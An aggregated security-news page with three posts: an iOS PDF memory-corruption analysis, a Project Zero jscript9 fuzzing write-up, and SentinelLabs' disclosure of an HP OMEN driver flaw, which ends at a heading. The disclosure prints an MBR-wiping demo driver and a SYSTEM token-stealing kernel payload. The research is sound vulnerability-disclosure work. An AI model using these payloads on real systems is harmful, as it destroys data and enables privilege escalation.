Normal view

There are new articles available, click to refresh the page.
Before yesterdayMain stream

The Recent iOS 0-Click, CVE-2021-30860, Sounds Familiar. An Unreleased Write-up: One Year Later

14 September 2021 at 19:11
The Recent iOS 0-Click, CVE-2021-30860, Sounds Familiar. An Unreleased Write-up: One Year Later

TLDR;

ZecOps identified and reproduced an Out-Of-Bounds Write vulnerability that can be triggered by opening a malformed PDF. This vulnerability reminded us of the FORCEDENTRY vulnerability exploited by NSO/Pegasus according to the CitizenLabs blog.

As a brief background: ZecOps have analyzed several devices of Al-Jazeera journalists in the summer 2020 and automatically and successfully found compromised devices without relying on any IOC. These attacks were later attributed to NSO / Pegasus.
ZecOps Mobile EDR and Mobile XDR are available here.

Noteworthy, although these two vulnerabilities are different – they are close enough and worth a deeper read.

Timeline:

  • We reported this vulnerability on September 1st, 2020 – iOS 14 beta was vulnerable at the time.
  • The vulnerability was patched on September 14th, 2020 – iOS 14 beta release.
  • Apple contacted us on October 20, 2020 – claiming that the bug was already fixed – (“We were unable to reproduce this issue using any current version of iOS 14. Are you able to reproduce this issue using any version of iOS 14? If so, we would appreciate any additional information you can provide us, such as an updated proof-of-concept.”).
    No CVE was assigned.

It is possible that NSO noticed this incremental bug fix, and dived deeper into CoreGraphics.

The Background

Earlier last year, we obtained a PDF file that cannot be previewed on iOS. The PDF sample crashes previewUI with segmentation fault, meaning that a memory corruption was triggered by the PDF.

Open the PDF previewUI flashes and shows nothing:

The important question is: how do we find out the source of the memory corruption?

The MacOS preview works fine, no crash. Meaning that it’s the iOS library that might have an issue. We confirmed the assumption with the iPhone Simulator, since the crash happened on the iPhone Simulator.

It’s great news since Simulator on MacOS provides better debug tools than iOS. However, having debug capability is not enough since the process crashes only when the corrupted memory is being used, which is AFTER the actual memory corruption.

We need to find a way to trigger the crash right at the point the memory corruption happens.

The idea is to leverage Guard Malloc or Valgrind, making the process crash right at the memory corruption occurs.

“Guard Malloc is a special version of the malloc library that replaces the standard library during debugging. Guard Malloc uses several techniques to try and crash your application at the specific point where a memory error occurs. For example, it places separate memory allocations on different virtual memory pages and then deletes the entire page when the memory is freed. Subsequent attempts to access the deallocated memory cause an immediate memory exception rather than a blind access into memory that might now hold other data.”

Environment Variables Injection

In this case we cannot simply add an environment variable with the command line since the previewUI launches on clicking the PDF which does not launch from the terminal, we need to inject libgmalloc before the launch.

The process “launchd_sim” launches Simulator XPC services with a trampoline process called “xpcproxy_sim”. The “xpcproxy_sim” launches target processes with a posix_spawn system call, which gives us an opportunity to inject environment variables into the target process, in this case “com.apple.quicklook.extension.previewUI”.

The following lldb command “process attach –name xpcproxy_sim –waitfor” allows us to attach xpcproxy_sim then set a breakpoint on posix_spawn once it’s launched.

Once the posix_spawn breakpoint is hit, we are able to read the original environment variables by reading the address stored in the $r9 register.

By a few simple lldb expressions, we are able to overwrite one of the environment variables into “DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib”, injection complete.

Continuing execution, the process crashed almost right away.

Analyzing the Crash

Finally we got the Malloc Guard working as expected, the previewUI crashes right at the memmove function that triggers the memory corruption.

After libgmalloc injection we have the following backtrace that shows an Out-Of-Bounds write occurs in “CGDataProviderDirectGetBytesAtPositionInternal”.

Thread 3 Crashed:: Dispatch queue: PDFKit.PDFTilePool.workQueue
0   libsystem_platform.dylib      	0x0000000106afc867 _platform_memmove$VARIANT$Nehalem + 71
1   com.apple.CoreGraphics        	0x0000000101b44a98 CGDataProviderDirectGetBytesAtPositionInternal + 179
2   com.apple.CoreGraphics        	0x0000000101d125ab provider_for_destination_get_bytes_at_position_inner + 562
3   com.apple.CoreGraphics        	0x0000000101b44b09 CGDataProviderDirectGetBytesAtPositionInternal + 292
4   com.apple.CoreGraphics        	0x0000000101c6c60c provider_with_softmask_get_bytes_at_position_inner + 611
5   com.apple.CoreGraphics        	0x0000000101b44b09 CGDataProviderDirectGetBytesAtPositionInternal + 292
6   com.apple.CoreGraphics        	0x0000000101dad19a get_chunks_direct + 242
7   com.apple.CoreGraphics        	0x0000000101c58875 img_raw_read + 1470
8   com.apple.CoreGraphics        	0x0000000101c65611 img_data_lock + 10985
9   com.apple.CoreGraphics        	0x0000000101c6102f CGSImageDataLock + 1674
10  com.apple.CoreGraphics        	0x0000000101a2479e ripc_AcquireRIPImageData + 875
11  com.apple.CoreGraphics        	0x0000000101c8399d ripc_DrawImage + 2237
12  com.apple.CoreGraphics        	0x0000000101c68d6f CGContextDrawImageWithOptions + 1112
13  com.apple.CoreGraphics        	0x0000000101ab7c94 CGPDFDrawingContextDrawImage + 752

With the same method, we can take one step further, with the MallocStackLogging flag libgmalloc provides, we can track the function call stack at the time of each allocation.

After setting the “MallocStackLoggingNoCompact=1”, we got the following backtrace showing that the allocation was inside CGDataProviderCreateWithSoftMaskAndMatte.

ALLOC 0x6000ec9f9ff0-0x6000ec9f9fff [size=16]:
0x7fff51c07b77 (libsystem_pthread.dylib) start_wqthread |
0x7fff51c08a3d (libsystem_pthread.dylib) _pthread_wqthread |
0x7fff519f40c4 (libdispatch.dylib) _dispatch_workloop_worker_thread |
0x7fff519ea044 (libdispatch.dylib) _dispatch_lane_invoke |
0x7fff519e9753 (libdispatch.dylib) _dispatch_lane_serial_drain |
0x7fff519e38cb (libdispatch.dylib) _dispatch_client_callout |
0x7fff519e2951 (libdispatch.dylib) _dispatch_call_block_and_release |
0x7fff2a9df04d (com.apple.PDFKit) __71-[PDFPageBackgroundManager forceUpdateActivePageIndex:withMaxDuration:]_block_invoke |
0x7fff2a9dfe76 (com.apple.PDFKit) -[PDFPageBackgroundManager _drawPageImage:forQuality:] |
0x7fff2aa23b85 (com.apple.PDFKit) -[PDFPage imageOfSize:forBox:withOptions:] |
0x7fff2aa23e1e (com.apple.PDFKit) -[PDFPage _newCGImageWithBox:bitmapSize:scale:offset:backgroundColor:withRotation:withAntialiasing:withAnnotations:withBookmark:withDelegate:] |
0x7fff2aa22a40 (com.apple.PDFKit) -[PDFPage _drawWithBox:inContext:withRotation:isThumbnail:withAnnotations:withBookmark:withDelegate:] |
0x7fff240bdfe0 (com.apple.CoreGraphics) CGContextDrawPDFPage |
0x7fff240bdac4 (com.apple.CoreGraphics) CGContextDrawPDFPageWithDrawingCallbacks |
0x7fff244bb0b1 (com.apple.CoreGraphics) CGPDFScannerScan | 0x7fff244bab02 (com.apple.CoreGraphics) pdf_scanner_handle_xname |
0x7fff2421e73c (com.apple.CoreGraphics) op_Do |
0x7fff2414dc94 (com.apple.CoreGraphics) CGPDFDrawingContextDrawImage |
0x7fff242fed6f (com.apple.CoreGraphics) CGContextDrawImageWithOptions |
0x7fff2431999d (com.apple.CoreGraphics) ripc_DrawImage |
0x7fff240ba79e (com.apple.CoreGraphics) ripc_AcquireRIPImageData |
0x7fff242f6fe8 (com.apple.CoreGraphics) CGSImageDataLock |
0x7fff242f758b (com.apple.CoreGraphics) img_image |
0x7fff24301fe2 (com.apple.CoreGraphics) CGDataProviderCreateWithSoftMaskAndMatte |
0x7fff51bddad8 (libsystem_malloc.dylib) calloc |
0x7fff51bdd426 (libsystem_malloc.dylib) malloc_zone_calloc 

The Vulnerability

The OOB-Write vulnerability happens in the function “CGDataProviderDirectGetBytesAtPositionInternal” of CoreGraphics library, the allocation of the target memory was inside the function “CGDataProviderCreateWithSoftMaskAndMatte“.

It allocates 16 bytes of memory if the “bits_per_pixel” equals or less than 1 byte, which is less than copy length.

We came out with a minimum PoC and reported to Apple on September 1st 2020, the issue was fixed on the iOS 14 release. We will release this POC soon.

ZecOps Mobile EDR & Mobile XDR customers are protected against NSO and are well equipped to discover other sophisticated attacks including 0-days attacks.

Fuzzing Closed-Source JavaScript Engines with Coverage Feedback

By: Ryan
14 September 2021 at 17:14

Posted by Ivan Fratric, Project Zero

tl;dr I combined Fuzzilli (an open-source JavaScript engine fuzzer), with TinyInst (an open-source dynamic instrumentation library for fuzzing). I also added grammar-based mutation support to Jackalope (my black-box binary fuzzer). So far, these two approaches resulted in finding three security issues in jscript9.dll (default JavaScript engine used by Internet Explorer).

Introduction or “when you can’t beat them, join them”

In the past, I’ve invested a lot of time in generation-based fuzzing, which was a successful way to find vulnerabilities in various targets, especially those that take some form of language as input. For example, Domato, my grammar-based generational fuzzer, found over 40 vulnerabilities in WebKit and numerous bugs in Jscript. 

While generation-based fuzzing is still a good way to fuzz many complex targets, it was demonstrated that, for finding vulnerabilities in modern JavaScript engines, especially engines with JIT compilers, better results can be achieved with mutational, coverage-guided approaches. My colleague Samuel Groß gives a compelling case on why that is in his OffensiveCon talk. Samuel is also the author of Fuzzilli, an open-source JavaScript engine fuzzer based on mutating a custom intermediate language. Fuzzilli has found a large number of bugs in various JavaScript engines.

While there has been a lot of development on coverage-guided fuzzers over the last few years, most of the public tooling focuses on open-source targets or software running on the Linux operating system. Meanwhile, I focused on developing tooling for fuzzing of closed-source binaries on operating systems where such software is more prevalent (currently Windows and macOS). Some years back, I published WinAFL, the first performant AFL-based fuzzer for Windows. About a year and a half ago, however, I started working on a brand new toolset for black-box coverage-guided fuzzing. TinyInst and Jackalope are the two outcomes of this effort.

It comes somewhat naturally to combine the tooling I’ve been working on with techniques that have been so successful in finding JavaScript bugs, and try to use the resulting tooling to fuzz JavaScript engines for which the source code is not available. Of such engines, I know two: jscript and jscript9 (implemented in jscript.dll and jscript9.dll) on Windows, which are both used by the Internet Explorer web browser. Of these two, jscript9 is probably more interesting in the context of mutational coverage-guided fuzzing since it includes a JIT compiler and more advanced engine features.

While you might think that Internet Explorer is a thing of the past and it doesn’t make sense to spend energy looking for bugs in it, the fact remains that Internet Explorer is still heavily exploited by real-world attackers. In 2020 there were two Internet Explorer 0days exploited in the wild and three in 2021 so far. One of these vulnerabilities was in the JIT compiler of jscript9. I’ve personally vowed several times that I’m done looking into Internet Explorer, but each time, more 0days in the wild pop up and I change my mind.

Additionally, the techniques described here could be applied to any closed-source or even open-source software, not just Internet Explorer. In particular, grammar-based mutational fuzzing described two sections down can be applied to targets other than JavaScript engines by simply changing the input grammar.

Approach 1: Fuzzilli + TinyInst

Fuzzilli, as said above, is a state-of-the-art JavaScript engine fuzzer and TinyInst is a dynamic instrumentation library. Although TinyInst is general-purpose and could be used in other applications, it comes with various features useful for fuzzing, such as out-of-the-box support for persistent fuzzing, various types of coverage instrumentations etc. TinyInst is meant to be simple to integrate with other software, in particular fuzzers, and has already been integrated with some.

So, integrating with Fuzzilli was meant to be simple. However, there were still various challenges to overcome for different reasons:

Challenge 1: Getting Fuzzilli to build on Windows where our targets are.

Edit 2021-09-20: The version of Swift for Windows used in this project was from January 2021, when I first started working on it. Since version 5.4, Swift Package Manager is supported on Windows, so building Swift code should be much easier now. Additionally, static linking is supported for C/C++ code.

Fuzzilli was written in Swift and the support for Swift on Windows is currently not great. While Swift on Windows builds exist (I’m linking to the builds by Saleem Abdulrasool instead of the official ones because the latter didn’t work for me), not all features that you would find on Linux and macOS are there. For example, one does not simply run swift build on Windows, as the build system is one of the features that didn’t get ported (yet). Fortunately, CMake and Ninja  support Swift, so the solution to this problem is to switch to the CMake build system. There are helpful examples on how to do this, once again from Saleem Abdulrasool.

Another feature that didn’t make it to Swift for Windows is statically linking libraries. This means that all libraries (such as those written in C and C++ that the user wants to include in their Swift project) need to be dynamically linked. This goes for libraries already included in the Fuzzilli project, but also for TinyInst. Since TinyInst also uses the CMake build system, my first attempt at integrating TinyInst was to include it via the Fuzzilli CMake project, and simply have it built as a shared library. However, the same tooling that was successful in building Fuzzilli would fail to build TinyInst (probably due to various platform libraries TinyInst uses). That’s why, in the end, TinyInst was being built separately into a .dll and this .dll loaded “manually” into Fuzzilli via the LoadLibrary API. This turned out not to be so bad - Swift build tooling for Windows was quite slow, and so it was much faster to only build TinyInst when needed, rather than build the entire Fuzzilli project (even when the changes made were minor).

The Linux/macOS parts of Fuzzilli, of course, also needed to be rewritten. Fortunately, it turned out that the parts that needed to be rewritten were the parts written in C, and the parts written in Swift worked as-is (other than a couple of exceptions, mostly related to networking). As someone with no previous experience with Swift, this was quite a relief. The main parts that needed to be rewritten were the networking library (libsocket), the library used to run and monitor the child process (libreprl) and the library for collecting coverage (libcoverage). The latter two were changed to use TinyInst. Since these are separate libraries in Fuzzilli, but TinyInst handles both of these tasks, some plumbing through Swift code was needed to make sure both of these libraries talk to the same TinyInst instance for a given target.

Challenge 2: Threading woes

Another feature that made the integration less straightforward than hoped for was the use of threading in Swift. TinyInst is built on a custom debugger and, on Windows, it uses the Windows debugging API. One specific feature of the Windows debugging API, for example WaitForDebugEvent, is that it does not take a debugee pid or a process handle as an argument. So then, the question is, if you have multiple debugees, to which of them does the API call refer? The answer to that is, when a debugger on Windows attaches to a debugee (or starts a debugee process), the thread  that started/attached it is the debugger. Any subsequent calls for that particular debugee need to be issued on that same thread.

In contrast, the preferred Swift coding style (that Fuzzilli also uses) is to take advantage of threading primitives such as DispatchQueue. When tasks get posted on a DispatchQueue, they can run in parallel on “background” threads. However, with the background threads, there is no guarantee that a certain task is always going to run on the same thread. So it would happen that calls to the same TinyInst instance happened from different threads, thus breaking the Windows debugging model. This is why, for the purposes of this project, TinyInst was modified to create its own thread (one for each target process) and ensure that any debugger calls for a particular child process always happen on that thread.

Various minor changes

Some examples of features Fuzzilli requires that needed to be added to TinyInst are stdin/stdout redirection and a channel for reading out the “status” of JavaScript execution (specifically, to be able to tell if JavaScript code was throwing an exception or executing successfully). Some of these features were already integrated into the “mainline” TinyInst or will be integrated in the future.

After all of that was completed though, the Fuzzilli/Tinyinst hybrid was running in a stable manner:

Note that coverage percentage reported by Fuzzilli is incorrect. Because TinyInst is a dynamic instrumentation library, it cannot know the number of basic blocks/edges in advance.

Primarily because of the current Swift on Windows issues, this closed-source mode of Fuzzilli is not something we want to officially support. However, the sources and the build we used can be downloaded here.

Approach 2: Grammar-based mutation fuzzing with Jackalope

Jackalope is a coverage-guided fuzzer I developed for fuzzing black-box binaries on Windows and, recently, macOS. Jackalope initially included mutators suitable for fuzzing of binary formats. However, a key feature of Jackalope is modularity: it is meant to be easy to plug in or replace individual components, including, but not limited to, sample mutators.

After observing how Fuzzilli works more closely during Approach 1, as well as observing samples it generated and the bugs it found, the idea was to extend Jackalope to allow mutational JavaScript fuzzing, but also in the future, mutational fuzzing of other targets whose samples can be described by a context-free grammar.

Jackalope uses a grammar syntax similar to that of Domato, but somewhat simplified (with some features not supported at this time). This grammar format is easy to write and easy to modify (but also easy to parse). The grammar syntax, as well as the list of builtin symbols, can be found on this page and the JavaScript grammar used in this project can be found here.

One addition to the Domato grammar syntax that allows for more natural mutations, but also sample minimization, are the <repeat_*> grammar nodes. A <repeat_x> symbol tells the grammar engine that it can be represented as zero or more <x> nodes. For example, in our JavaScript grammar, we have

<statementlist> = <repeat_statement>

telling the grammar engine that <statementlist> can be constructed by concatenating zero or more <statement>s. In our JavaScript grammar, a <statement> expands to an actual JavaScript statement. This helps the mutation engine in the following way: it now knows it can mutate a sample by inserting another <statement> node anywhere in the <statementlist> node. It can also remove <statement> nodes from the <statementlist> node. Both of these operations will keep the sample valid (in the grammar sense).

It’s not mandatory to have <repeat_*> nodes in the grammar, as the mutation engine knows how to mutate other nodes as well (see the list of mutations below). However, including them where it makes sense might help make mutations in a more natural way, as is the case of the JavaScript grammar.

Internally, grammar-based mutation works by keeping a tree representation of the sample instead of representing the sample just as an array of bytes (Jackalope must in fact represent a grammar sample as a sequence of bytes at some points in time, e.g when storing it to disk, but does so by serializing the tree and deserializing when needed). Mutations work by modifying a part of the tree in a manner that ensures the resulting tree is still valid within the context of the input grammar. Minimization works by removing those nodes that are determined to be unnecessary.

Jackalope’s mutation engine can currently perform the following operations on the tree:

  • Generate a new tree from scratch. This is not really a mutation and is mainly used to bootstrap the fuzzers when no input samples are provided. In fact, grammar fuzzing mode in Jackalope must either start with an empty corpus or a corpus generated by a previous session. This is because there is currently no way to parse a text file (e.g. a JavaScript source file) into its grammar tree representation (in general, there is no guaranteed unique way to parse a sample with a context-free grammar).
  • Select a random node in the sample's tree representation. Generate just this node anew while keeping the rest of the tree unchanged.
  • Splice: Select a random node from the current sample and a node with the same symbol from another sample. Replace the node in the current sample with a node from the other sample.
  • Repeat node mutation: One or more new children get added to a <repeat_*> node, or some of the existing children get replaced.
  • Repeat splice: Selects a <repeat_*> node from the current sample and a similar <repeat_*> node from another sample. Mixes children from the other node into the current node.

JavaScript grammar was initially constructed by following  the ECMAScript 2022 specification. However, as always when constructing fuzzing grammars from specifications or in a (semi)automated way, this grammar was only a starting point. More manual work was needed to make the grammar output valid and generate interesting samples more frequently.

Jackalope now supports grammar fuzzing out-of-the box, and, in order to use it, you just need to add -grammar <path_to_grammar_file> to Jackalope’s command lines. In addition to running against closed-source targets on Windows and macOS, Jackalope can now run against open-source targets on Linux using Sanitizer Coverage based instrumentation. This is to allow experimentation with grammar-based mutation fuzzing on open-source software.

The following image shows Jackalope running against jscript9.

Jackalope running against jscript9.

Results

I ran Fuzzilli for several weeks on 100 cores. This resulted in finding two vulnerabilities, CVE-2021-26419 and CVE-2021-31959. Note that the bugs that were analyzed and determined not to have security impact are not counted here. Both of the vulnerabilities found were in the bytecode generator, a part of the JavaScript engine that is typically not very well tested by generation-based fuzzing approaches. Both of these bugs were found relatively early in the fuzzing process and would be findable even by fuzzing on a single machine.

The second of the two bugs was particularly interesting because it initially manifested only as a NULL pointer dereference that happened occasionally, and it took quite a bit of effort (including tracing JavaScript interpreter execution in cases where it crashed and in cases where it didn’t to see where the execution flow diverges) to reach the root cause. Time travel debugging was also useful here - it would be quite difficult if not impossible to analyze the sample without it. The reader is referred to the vulnerability report for further details about the issue.

Jackalope was run on a similar setup: for several weeks on 100 cores. Interestingly, at least against jscript9, Jackalope with grammar-based mutations behaved quite similarly to Fuzzilli: it was hitting a similar level of coverage and finding similar bugs. It also found CVE-2021-26419 quickly into the fuzzing process. Of course, it’s easy to re-discover bugs once they have already been found with another tool, but neither the grammar engine nor the JavaScript grammar contain anything specifically meant for finding these bugs.

About a week and a half into fuzzing with Jackalope, it triggered a bug I hadn't seen before, CVE-2021-34480. This time, the bug was in the JIT compiler, which is another component not exercised very well with generation-based approaches. I was quite happy with this find, because it validated the feasibility of a grammar-based approach for finding JIT bugs.

Limitations and improvement ideas

While successful coverage-guided fuzzing of closed-source JavaScript engines is certainly possible as demonstrated above, it does have its limitations. The biggest one is inability to compile the target with additional debug checks. Most of the modern open-source JavaScript engines include additional checks that can be compiled in if needed, and enable catching certain types of bugs more easily, without requiring that the bug crashes the target process. If jscript9 source code included such checks, they are lost in the release build we fuzzed.

Related to this, we also can’t compile the target with something like Address Sanitizer. The usual workaround for this on Windows would be to enable Page Heap for the target. However, it does not work well here. The reason is, jscript9 uses a custom allocator for JavaScript objects. As Page Heap works by replacing the default malloc(), it simply does not apply here.

A way to get around this would be to use instrumentation (TinyInst is already a general-purpose instrumentation library so it could be used for this in addition to code coverage) to instrument the allocator and either insert additional checks or replace it completely. However, doing this was out-of-scope for this project.

Conclusion

Coverage-guided fuzzing of closed-source targets, even complex ones such as JavaScript engines is certainly possible, and there are plenty of tools and approaches available to accomplish this.

In the context of this project, Jackalope fuzzer was extended to allow grammar-based mutation fuzzing. These extensions have potential to be useful beyond just JavaScript fuzzing and can be adapted to other targets by simply using a different input grammar. It would be interesting to see which other targets the broader community could think of that would benefit from a mutation-based approach.

Finally, despite being targeted by security researchers for a long time now, Internet Explorer still has many exploitable bugs that can be found even without large resources. After the development on this project was complete, Microsoft announced that they will be removing Internet Explorer as a separate browser. This is a good first step, but with Internet Explorer (or Internet Explorer engine) integrated into various other products (most notably, Microsoft Office, as also exploited by in-the-wild attackers), I wonder how long it will truly take before attackers stop abusing it.

CVE-2021-3437 | HP OMEN Gaming Hub Privilege Escalation Bug Hits Millions of Gaming Devices

14 September 2021 at 11:00

Executive Summary

  • SentinelLabs has discovered a high severity flaw in an HP OMEN driver affecting millions of devices worldwide.
  • Attackers could exploit these vulnerabilities to locally escalate to kernel-mode privileges. With this level of access, attackers can disable security products, overwrite system components, corrupt the OS, or perform any malicious operations unimpeded.
  • SentinelLabs’ findings were proactively reported to HP on Feb 17, 2021 and the vulnerability is tracked as CVE-2021-3437, marked with CVSS Score 7.8.
  • HP has released a security update to its customers to address these vulnerabilities.
  • At this time, SentinelOne has not discovered evidence of in-the-wild abuse.

Introduction

HP OMEN Gaming Hub, previously known as HP OMEN Command Center, is a software product that comes preinstalled on HP OMEN desktops and laptops. This software can be used to control and optimize settings such as device GPU, fan speeds, CPU overclocking, memory and more. The same software is used to set and adjust lighting and other controls on gaming devices and accessories such as mouse and keyboard.

Following on from our previous research into other HP products, we discovered that this software utilizes a driver that contains vulnerabilities that could allow malicious actors to achieve a privilege escalation to kernel mode without needing administrator privileges.

CVE-2021-3437 essentially derives from the HP OMEN Gaming Hub software using vulnerable code partially copied from an open source driver. In this research paper, we present details explaining how the vulnerability occurs and how it can be mitigated. We suggest best practices for developers that would help reduce the attack surface provided by device drivers with exposed IOCTLs handlers to low-privileged users.

Technical Details

Under the hood of HP OMEN Gaming Hub lies the HpPortIox64.sys driver, C:\Windows\System32\drivers\HpPortIox64.sys. This driver is developed by HP as part of OMEN, but it is actually a partial copy of another problematic driver, WinRing0.sys, developed by OpenLibSys.

The link between the two drivers can readily be seen as on some signed HP versions the metadata information shows the original filename and product name:

File Version information from CFF Explorer

Unfortunately, issues with the WinRing0.sys driver are well-known. This driver enables user-mode applications to perform various privileged kernel-mode operations via IOCTLs interface.

The operations provided by the HpPortIox64.sys driver include read/write kernel memory, read/write PCI configurations, read/write IO ports, and MSRs. Developers may find it convenient to expose a generic interface of privileged operations to user mode for stability reasons by keeping as much code as possible from the kernel-module.

The IOCTL codes 0x9C4060CC, 0x9C4060D0, 0x9C4060D4, 0x9C40A0D8, 0x9C40A0DC and 0x9C40A0E0 allow user mode applications with low privileges to read/write 1/2/4 bytes to or from an IO port. This could be leveraged in several ways to ultimately run code with elevated privileges in a manner we have previously described here.

The following image highlights the vulnerable code that allows unauthorized access to IN/OUT instructions, with IN instructions marked in red and OUT instructions marked in blue:

The Vulnerable Code – unauthorized access to IN/OUT instructions

Since I/O privilege level (IOPL) equals the current privilege level (CPL), it is possible to interact with peripheral devices such as internal storage and GPU to either read/write directly to the disk or to invoke Direct Memory Access (DMA) operations. For example, we could communicate with ATA port IO for directly writing to the disk, then overwrite a binary that is loaded by a privileged process.

For the purposes of illustration, we wrote this sample driver to demonstrate the attack without pursuing an actual exploit:

unsigned char port_byte_in(unsigned short port) {
	return __inbyte(port);
}

void port_byte_out(unsigned short port, unsigned char data) {
	__outbyte(port, data);
}

void port_long_out(unsigned short port, unsigned long data) {
	__outdword(port, data);
}

unsigned short port_word_in(unsigned short port) {
	return __inword(port);
}

#define BASE 0x1F0

void read_sectors_ATA_PIO(unsigned long LBA, unsigned char sector_count) {
	ATA_wait_BSY();
	port_byte_out(BASE + 6, 0xE0 | ((LBA >> 24) & 0xF));
	port_byte_out(BASE + 2, sector_count);
	port_byte_out(BASE + 3, (unsigned char)LBA);
	port_byte_out(BASE + 4, (unsigned char)(LBA >> 8));
	port_byte_out(BASE + 5, (unsigned char)(LBA >> 16));
	port_byte_out(BASE + 7, 0x20); //Send the read command


	for (int j = 0; j < sector_count; j++) {
		ATA_wait_BSY();
		ATA_wait_DRQ();
		for (int i = 0; i < 256; i++) { USHORT a = port_word_in(BASE); DbgPrint("0x%x, ", a); } } } void write_sectors_ATA_PIO(unsigned char LBA, unsigned char sector_count) { ATA_wait_BSY(); port_byte_out(BASE + 6, 0xE0 | ((LBA >> 24) & 0xF));
	port_byte_out(BASE + 2, sector_count);
	port_byte_out(BASE + 3, (unsigned char)LBA);
	port_byte_out(BASE + 4, (unsigned char)(LBA >> 8));
	port_byte_out(BASE + 5, (unsigned char)(LBA >> 16));
	port_byte_out(BASE + 7, 0x30);

	for (int j = 0; j < sector_count; j++)
	{
		ATA_wait_BSY();
		ATA_wait_DRQ();
		for (int i = 0; i < 256; i++) { port_long_out(BASE, 0xffffffff); } } } static void ATA_wait_BSY() //Wait for bsy to be 0 { while (port_byte_in(BASE + 7) & STATUS_BSY); } static void ATA_wait_DRQ() //Wait fot drq to be 1 { while (!(port_byte_in(BASE + 7) & STATUS_RDY)); } NTSTATUS DriverEntry(PDRIVER_OBJECT driver_object, PUNICODE_STRING registry) { UNREFERENCED_PARAMETER(registry); driver_object->DriverUnload = drv_unload;

	DbgPrint("Before: \n");
	read_sectors_ATA_PIO(0, 1);
	write_sectors_ATA_PIO(0, 1);
	
	DbgPrint("\nAfter: \n");
	read_sectors_ATA_PIO(0, 1);

	return STATUS_SUCCESS;
}

This ATA PIO read/write is based on LearnOS. Running this driver will result in the following DebugView prints:

Debug logging from the driver in DbgView utility

Trying to restart this machine will result in an ‘Operating System not found’ error message because our demo driver destroyed the first sector of the disk (the MBR).

The machine fails to boot due to corrupted MBR

It’s worth mentioning that the impact of this vulnerability is platform dependent. It can potentially be used to attack device firmware or perform legacy PCI access by accessing ports 0xCF8/0xCFC. Some laptops may have embedded controllers which are reachable via IO port access.

Another interesting vulnerability in this driver is an arbitrary MSR read/write, accessible via IOCTLs 0x9C402084 and 0x9C402088. Model-Specific Registers (MSRs) are registers for querying or modifying CPU data. RDMSR and WRMSR are used to read and write to MSR accordingly. Documentation for WRMSR and RDMSR can be found on Intel(R) 64 and IA-32 Architecture Software Developer’s Manual Volume 2 Chapter 5.

In the following image, arbitrary MSR read is marked in green, MSR write in blue, and HLT is marked in red (accessible via IOCTL 0x9C402090, which allows executing the instruction in a privileged context).

Vulnerable code with unauthorized access to MSR registers

Most modern systems only use MSR_LSTAR during a system call transition from user-mode to kernel-mode:

MSR_LSTAR MSR register in WinDbg

It should be noted that on 64-bit KPTI enabled systems, LSTAR MSR points to nt!KiSystemCall64Shadow.

The entire transition process looks something like as follows:

The entire process of transition from the User Mode to Kernel mode

These vulnerabilities may allow malicious actors to execute code in kernel mode very easily, since the transition to kernel-mode is done via an MSR. This is basically an exposed WRMSR instruction (via IOCTL) that gives an attacker an arbitrary pointer overwrite primitive. We can overwrite the LSTAR MSR and achieve a privilege escalation to kernel mode without needing admin privileges to communicate with this device driver.

Using the DeviceTree tool from OSR, we can see that this driver accepts IOCTLs without ACLs enforcements (note: Some drivers handle access to devices independently in IRP_MJ_CREATE routines):

Using DeviceTree software to examine the security descriptor of the device
The function that handles IOCTLs to write to arbitrary MSRs

Weaponizing this kind of vulnerability is trivial as there’s no need to reinvent anything; we just took the msrexec project and armed it with our code to elevate our privileges.

Our payload to elevate privileges:

	//extern "C" void elevate_privileges(UINT64 pid);
	//DWORD current_process_id = GetCurrentProcessId();
	vdm::msrexec_ctx msrexec(_write_msr);
	msrexec.exec([&](void* krnl_base, get_system_routine_t get_kroutine) -> void
	{
		const auto dbg_print = reinterpret_cast(get_kroutine(krnl_base, "DbgPrint"));
		const auto ex_alloc_pool = reinterpret_cast(get_kroutine(krnl_base, "ExAllocatePool"));

		dbg_print("> allocated pool -> 0x%p\n", ex_alloc_pool(NULL, 0x1000));
		dbg_print("> cr4 -> 0x%p\n", __readcr4());
		elevate_privileges(current_process_id);
	});

The assembly payload:

elevate_privileges proc
_start:
	push rsi
	mov rsi, rcx
	mov rbx, gs:[188h]
	mov rbx, [rbx + 220h]
	
__findsys:
	mov rbx, [rbx + 448h]
	sub rbx, 448h
	mov rcx, [rbx + 440h]
	cmp rcx, 4
	jnz __findsys

	mov rax, rbx
	mov rbx, gs:[188h]
	mov rbx, [rbx + 220h]

__findarg:
	mov rbx, [rbx + 448h]
	sub rbx, 448h
	mov rcx, [rbx + 440h]
	cmp rcx, rsi
	jnz __findarg

	mov rcx, [rax + 4b8h]
	and cl, 0f0h
	mov [rbx + 4b8h], rcx

	xor rax, rax
	pop rsi
	ret
elevate_privileges endp

Note that this payload is written specifically for Windows 10 20H2.

Let’s see what it looks like in action.

OMEN Gaming Hub Privilege Escalation

Initially, HP developed a fix that verifies the initiator user-mode applications that communicate with the driver. They open the nt!_FILE_OBJECT of the callee, parsing its PE and validating the digital signature, all from kernel mode. While this in itself should be considered unsafe, their implementation (which also introduced several additional vulnerabilities) did not fix the original issue. It is very easy to bypass these mitigations using various techniques such as “Process Hollowing”. Consider the following program as an example:

int main() {

    puts("Opening a handle to HpPortIO\r\n");

    hDevice = CreateFileW(L"\\\\.\\HpPortIO", FILE_ANY_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {

        printf("failed! getlasterror: %d\r\n", GetLastError());


        return -1;

    }

    printf("succeeded! handle: %x\r\n", hDevice);

    return -1;

}

Running this program against the fix without Process Hollowing will result in:

    Opening a handle to HpPortIO failed! 
    getlasterror: 87

While running this with Process Hollowing will result in:

    Opening a handle to HpPortIO succeeded! 
    handle: <HANDLE>

It’s worth mentioning that security mechanisms such as PatchGuard and security hypervisors should mitigate this exploit to a certain extent. However, PatchGuard can still be bypassed. Some of its protected structure/data are MSRs, but since PatchGuard samples these assets periodically, restoring the original values very quickly may enable you to bypass it.

Impact

An exploitable kernel driver vulnerability can lead an unprivileged user to SYSTEM, since the vulnerable driver is locally available to anyone.

This high severity flaw, if exploited, could allow any user on the computer, even without privileges, to escalate privileges and run code in kernel mode. Among the obvious abuses of such vulnerabilities are that they could be used to bypass security products.

An attacker with access to an organization’s network may also gain access to execute code on unpatched systems and use these vulnerabilities to gain local elevation of privileges. Attackers can then leverage other techniques to pivot to the broader network, like lateral movement.

Impacted products:

  • HP OMEN Gaming Hub prior to version 11.6.3.0 is affected
  • HP OMEN Gaming Hub SDK Package prior 1.0.44 is affected

Development Suggestions

